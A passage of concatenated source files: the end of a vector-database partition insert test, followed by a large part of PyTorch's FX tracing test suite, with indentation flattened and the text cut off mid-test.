target: verify insert maximum size data(256M?) a time
method: 1.create a collection with default dim
2. insert dismatch dim data
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1.create a partition
2. insert data in sync
expected: insert successfully
"""
pass
|
test_fx.py | import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap
import torch._C._fx # type: ignore
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.quantization import Quantizer
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision.models import resnet18
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
return
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
@skipIfNoTorchVision
def test_resnet(self):
resnet = resnet18()
resnet.train()
res_graph = symbolic_trace(resnet)
res_script = torch.jit.script(res_graph)
ip = torch.rand(1, 3, 224, 224)
a = resnet(ip)
b = res_graph(ip)
c = res_script(ip)
self.assertEqual(a, b)
self.assertEqual(a, c)
quantizer = Quantizer(res_graph)
for i in range(10):
quantizer.observe((torch.rand(1, 3, 224, 224),))
qgraph = quantizer.quantize()
qgraph.graph.lint()
qgraph_script = torch.jit.script(qgraph)
d = qgraph(ip)
e = qgraph_script(ip)
assert (a - d).abs().max() < 2
self.assertEqual(d, e)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
